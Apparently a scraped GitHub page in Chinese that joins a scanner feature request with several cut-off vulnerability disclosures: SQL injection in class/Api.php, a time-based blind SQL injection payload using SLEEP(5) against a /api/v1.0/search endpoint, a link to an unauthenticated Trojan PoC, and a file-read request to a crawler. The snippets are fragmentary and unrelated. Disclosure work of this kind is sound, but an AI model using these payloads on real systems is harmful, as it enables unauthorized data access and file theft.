EndlessParadox

1.在测试大量站点时，能不能先做webpack的检测，之后根据结果再去做测试？或者仅仅是导出结果，给测试人员手工测试。

在访问跟目录，利用header头重写URL时，部分web服务器无视header直接访问根目录造成误报，希望加入内容对比排除误报

### 漏洞点: 在class/Api.php中的301行代码，sql采取了直接拼接的方式，用户输入可控将造成sql注入，''批量修改链接属性为公有或私有“函数中，下面代码是在0.9.34版本的截图：  登录后触发批量修改，抓取数据包： ``` POST /index.php?c=api&method=set_link_attribute HTTP/1.1 Host: 192.168.6.120:9999 Content-Length: 148 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)...

漏洞功能在UI此处： 漏洞出现源出现/api/v1.0/search , 在query参数未过滤恶意字符，最终完整的拼接在DocumentFullTextDao.java代码的157行代码，dslContext构建的时候将拿到完整的字符拼接进入，将执行完整的SQL语句： 利用过程，发送延迟数据包，使得系统延迟5s： ``` GET /api/v1.0/search?query=')))+AND+(SELECT+2859+FROM+(SELECT(SLEEP(5)))HraM)%23 HTTP/1.1 Host: 127.0.0.1:9080 sec-ch-ua-platform: "Linux" Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJEYXRhYmFzaXIiLCJleHAiOjE3NjQ1ODA2ODUsInVzZXJuYW1lIjoiTi9BIn0.OHS6FZ10ym6iXDcXnxvzaH5_DU0FOa_Q7sHb06h9A3k Accept-Language: en-US,en;q=0.9 Accept: application/json, text/plain, */* sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99" User-Agent: Mozilla/5.0 (X11; Linux x86_64)...

漏洞详情： https://github.com/ainrm/Jrohy-trojan-unauth-poc/blob/main/README.en.md https://nvd.nist.gov/vuln/detail/cve-2025-5525

此漏洞在编辑模式，爬虫强力模式中，影响包括v2.12之前的版本 构造恶意的链接即可读取文件 请求和响应数据包： 原始请求包： ``` POST /crawl HTTP/1.1 Host: localhost:8181 Content-Length: 57 sec-ch-ua-platform: "Linux" Accept-Language: en-US,en;q=0.9 sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99" sec-ch-ua-mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,...